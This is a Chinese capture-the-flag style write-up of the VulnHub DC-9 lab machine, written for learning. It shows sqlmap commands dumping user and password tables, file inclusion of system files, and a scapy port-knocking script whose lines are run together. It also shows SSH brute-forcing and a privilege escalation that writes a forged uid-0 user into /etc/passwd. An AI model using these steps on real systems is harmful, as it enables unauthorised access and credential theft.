DC-9笔记

靶机信息

官网:DC: 9 ~ VulnHub

请添加图片描述

只有一个flag,官网上没给其他提示

信息收集

nmap 192.168.66.2-254

请添加图片描述

nmap 192.168.66.146 -A -p-

请添加图片描述

开放了80端口,22端口是filtered的,被过滤?

NMAP 六种端口状态解读_nmap filtered-CSDN博客

那来看看http服务吧

http(80)

请添加图片描述

页脚是空白的,插件也没有检测到用什么框架,自己写的吗?

请添加图片描述

display.php页面找到了一些用户信息

请添加图片描述

results.php页面能查找用户,觉得有sql注入的可能

manage.php页面是个登录页面,那么我们来看看results或者manage这两个页面有没有sql注入吧

请添加图片描述

搁results.php找到了sql注入

请添加图片描述

python3 .\sqlmap.py -r C:\Users\N\Desktop\123.txt -D Staff -T Users -C "Password,UserID,Username" --dump

请添加图片描述

+----------------------------------+--------+----------+
| Password                         | UserID | Username |
+----------------------------------+--------+----------+
| 856f5de590ef37314e7c3bdf6f8a66dc | 1      | admin    |
+----------------------------------+--------+----------+

MD5免费在线解密破解_MD5在线加密-SOMD5

密文解开是:transorbital1

登录后台

请添加图片描述

页脚有个文件不存在,一下子就想到了之前的文件包含漏洞,也是页脚文件的包含

请添加图片描述

包含上了,但是吧,php伪协议试过了,用不了

那就随便翻翻系统的敏感文件吧

Linux常见的敏感目录 - 楼–楼 - 博客园 (cnblogs.com)

windows和linux敏感文件记录_渗透测试windows敏感文件-CSDN博客

linux调度器(十)——调度器/proc信息解读 - delay疯子 - 博客园 (cnblogs.com)

最后在/proc/sched_debug文件里找到了突破口

请添加图片描述

通过Knockd隐藏SSH,让黑客看不见你的服务器-CSDN博客

ssh(22)

好家伙,难怪ssh信息收集的时候显示filtered,原来使用knockd做了隐藏,那么我们需要端口敲门才行

包含knockd服务的配置文件来看开门条件

请添加图片描述

我们需要采用syn报文依次访问7469,8475,9842端口才可以开启22端口

python写个敲门脚本

from scapy.all import *dst = "192.168.66.146"
sport = 5678
dports = [7469,8475,9842]
iface = "VMware Virtual Ethernet Adapter for VMnet1"for i in dports:dport=ipkt = IP(dst = dst)/TCP(sport = sport, dport = dport , flags = 'S')fb = sr (pkt,iface=iface ,timeout=1,verbose=0)print("敲门成功")

运行后再次对目标进行探测,发现22端口已经是开放状态了

请添加图片描述

接着就是用户名和密码了,用户名我们可以从/etc/passwd文件里获取

密码我在后面又发现了一个新的数据库是users

python3 .\sqlmap.py -r C:\Users\N\Desktop\123.txt -D users -T UserDetails -C "firstname,id,lastname,password,reg_date,username" --dump
+-----------+----+------------+---------------+---------------------+-----------+
| firstname | id | lastname   | password      | reg_date            | username  |
+-----------+----+------------+---------------+---------------------+-----------+
| Mary      | 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     |
| Julie     | 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    |
| Fred      | 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     |
| Barney    | 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   |
| Tom       | 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      |
| Jerry     | 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    |
| Wilma     | 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    |
| Betty     | 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    |
| Chandler  | 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb |
| Joey      | 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     |
| Rachel    | 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   |
| Ross      | 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     |
| Monica    | 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   |
| Phoebe    | 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   |
| Scooter   | 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    |
| Donald    | 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   |
| Scott     | 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  |
+-----------+----+------------+---------------+---------------------+-----------+

用拿到的用户和密码去爆破ssh,所有的信息汇总一下,一共是43个已知用户名和18个已知密码

请添加图片描述

多爆破两次,出来了三个用户名

chandlerb:UrAG0D!
janitor:Ilovepeepee
joeyt:Passw0rd

提权

三个用户都能ssh登录,但是只在janitor用户里找到了线索

janitor用户home里有个.secrets-for-putin文件夹

请添加图片描述

里面有一个密码字典文件,我们给复制出来,然后接着用之前的用户名去爆破

请添加图片描述

又出来个账号密码

fredf:B4-Tru3-001

请添加图片描述

我们搁sudo -l里看见了提权的线索,一个可以以root权限执行的文件

是个可执行文件,大概率是test.py编译出来的

请添加图片描述

在/opt/devstuff目录下发现了test.py文件

请添加图片描述

简单,读一个文件然后将内容写入到另一个文件以root权限

linux默认不让空密码登录,所以先生成一个密码,然后仿造/etc/passwd文件的格式写一个root权限格式的用户

然后su切换过去就可以以root权限登陆了

cd /tmp
# 首先切换到tmp目录防止权限问题
openssl passwd -1 -salt 123 123
# 生成加盐密码
echo '123:$1$123$nE5gIYTYiF1PIXVOFjQaW/:0:0::/root:/bin/bash' > 1.txt
# 伪造用户信息
sudo /opt/devstuff/dist/test/test /tmp/1.txt /etc/passwd
# 写入假用户信息进/etc/passwd文件

请添加图片描述

flag

请添加图片描述

小结

这个靶机最让我意想不到的是端口敲门,之前没接触过这种藏匿端口的方式

然后也接触到了很多linux系统的敏感文件位置

然后就是用户信息我们收集到就不要忽视,不断扩大自己的字典去爆破

DC系列告一段落了,打下来还是有很多收获的,扩宽了很多思路

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/63372.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

STM32-笔记3-驱动蜂鸣器

1、复制03项目,重命名为04项目 打开04项目的Drivers/BSP/led文件夹,把led文件夹更改为beep文件夹,改文件夹内部的.c和.h文件更改为beep.c和beep.h文件,如下图所示。 2、打开工程文件 出现弹窗,显示找不到xx文件&#…

PHP开发日志 ━━ 基础知识:四种不同的变量返回方式该如何调用

最近在给框架升级,其中涉及到古早的缓存系统升级,现在准备区分类型为混合、变量和普通文件,那么变量用什么形式存储到缓存才能给后续开发带来便利和通用性呢?于是就涉及到了本文的php基础知识。 好吧,又是一个无用的知…

概率论得学习和整理30: 用EXCEL 描述泊松分布 poisson distribution

目录 1 泊松分布的基本内容 1.1 泊松分布的关键点 1.1.1 属于离散分布 1.1.2 泊松分布的特点:每个子区间内概率相等 , λ就是平均概率 1.2 核心参数 1.3 pmf公式 1.4 期望和方差 2 例1:用EXCEL计算泊松分布的概率 3 比较λ不同值时…

测试工程师八股文05|功能测试、业务测试

一、基础概念 1、软件测试分类 1️⃣按照软件产生的阶段划分 单元测试:针对程序源代码进行测试【开发自测】集成测试:针对模块之间功能交互进行测试系统测试:对整个系统(功能、非功能)进行全面测试验收测试&#xff…

图(dfs与bfs)算法2

进度:15/100 原题1: 给你一棵二叉树的根节点 root ,翻转这棵二叉树,并返回其根节点。 (力扣的图) 原题2: 给定二叉树的根节点 root ,返回所有左叶子之和。 原题3: 给…

UE UMG 多级弹出菜单踩坑

多级弹出菜单 https://www.bilibili.com/video/BV1ub411J7nA 运行时添加 widget 的方法 create widget 然后 add child 到某个组件,比如 canvas 运行时修改 widget 位置的方法 set widget slot position 用起来没效果 怀疑是因为我没有传入 slot 但是暂时不知…

sunset: midnight

https://www.vulnhub.com/entry/sunset-midnight,517/ 主机发现端口扫描 探测存活主机,8是靶机 nmap -sP 192.168.56.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 16:49 CST Nmap scan report for 192.168.56.1 …

伊克罗德与九科信息共同发布RPA+AI智能机器人解决方案

12月12日,伊克罗德信息在上海举办“创见AI,迈进智能化未来——科技赋能零售电商”活动,与九科信息、亚马逊云科技共同探讨与分享,融合生成式AI技术和智能自动化(RPA,Robotic Process Automation)在电商零售…

从 CephFS 到 JuiceFS:同程旅行亿级文件存储平台构建之路

随着公司业务的快速发展,同程旅行的非结构化的数据突破 10 亿,在 2022 年,同程首先完成了对象存储服务的建设。当时,分布式文件系统方面,同程使用的是 CephFS,随着数据量的持续增长,CephFS 的高…

固定资产分类,提升资产盘活效益

固定资产是企业长期使用的重要资源,涵盖范围广、种类多,不同的资产需要针对性管理。通过科学的分类与高效的盘活策略,不仅可以优化资源配置,还能提升企业资产的利用效率和经济效益。以下将详细解析固定资产的分类方式和盘活效益的…

【字符串匹配算法——BF算法】

🌈个人主页: Aileen_0v0 🔥热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 ​💫个人格言:“没有罗马,那就自己创造罗马~” 文章目录 BF算法介绍及过程演示代码实现过程下节预告KMP算法利用next数组存储子串中j回退的位置(…

Linux 文件系统目录结构及其简要介绍

Hello! 亲爱的小伙伴们,大家好呀(Smile~)!我是 H u a z z i Huazzi Huazzi,欢迎观看本篇博客,接下来让我们一起来学习一下Linux 文件系统目录结构吧!祝你有所收获! 本篇博客的目录&a…

小米准备入局Nas?Nas究竟是啥?能干啥?

一开头就来了个三连问:小米准备入局Nas?Nas究竟是啥?Nas能干啥? 好像这段时间Nas这个词频频出现,但很多小伙伴都不知道这个是什么设备。首先咱们来解决一下名词Nas是什么意思。 什么是Nas? 为了尽可能解释…

基于Socket实现客户端和服务端的Tcp通信(C#)

0.前言 使用C#和Unity实现复刻Liar’s bar中的功能 软件开发大作业 本系列文章用于记录与分享开发过程中使用到的知识点,以及常见错误 本文主要描述有关网络编程的内容 目录 0.前言1.使用Socket搭建Server1.1Server端的Socket连接1.2 Server端接收Client的信息1.3…

游戏AI实现-寻路算法(A*)

A*(A-star)是一种图遍历和寻路算法,由于其完整性、最优性和最佳效率,它被用于计算机科学的许多领域。给定一个加权图、一个源节点和一个目标节点,该算法将找到从源到目标的最短路径(相对于给定的权重&#…

汽车供应链 “剧变”开始,“智能感知潜在龙头”诞生

智能汽车产业链“剧变”已经开启,智能感知软硬件能力的权重正在不断被放大。 比如满足高阶泊车的第二代AK2超声波传感器、满足人机共驾场景需求的电子外后视镜(CMS)、iTOF 3D成像视觉感知(用于舱内监控)等新产品&…

Latex中表格添加底部文本注释并调整对齐

如何实现从第一个表到第三个表的转换, 其中主要涉及到两点: (1)底部脚注与表格自动对齐并缩进换行 (2)表格自适应页面宽度 底部脚注的对齐与换行缩进需要用到 \usepackage{threeparttable} \usepackage{…

html基础-认识html

1.什么是html html是浏览器可以识别的的标记语言&#xff0c;我们在浏览器浏览的网页就是一个个的html文档 <!DOCTYPE html> <html> <head> <meta charset"utf-8"> <title>认识html</title> </head> <body><h1…

利用高德API获取整个城市的公交路线并可视化(七)

本篇文章是对我们从高德拿到的公交/地铁的json文件的精细化处理的一个深入解析&#xff0c;通过对这些原始数据进行详细的清洗、转换和分析&#xff0c;我们通过对数据的质量和可用性的提升&#xff0c;来为后续的数据精细化处理和研究做基础数据的支撑&#xff0c;从而为后续的…

OGV格式如何转换成MP4格式?五款视频格式转换工具

在数字时代&#xff0c;视频已成为我们日常生活、工作和学习中不可或缺的一部分。而不同的设备和平台往往支持不同的视频格式&#xff0c;这就需要对视频进行格式转换。 OGV&#xff08;Ogg Video File&#xff09;是一种使用OGG开源格式的容器&#xff0c;用于存储带或不带音频…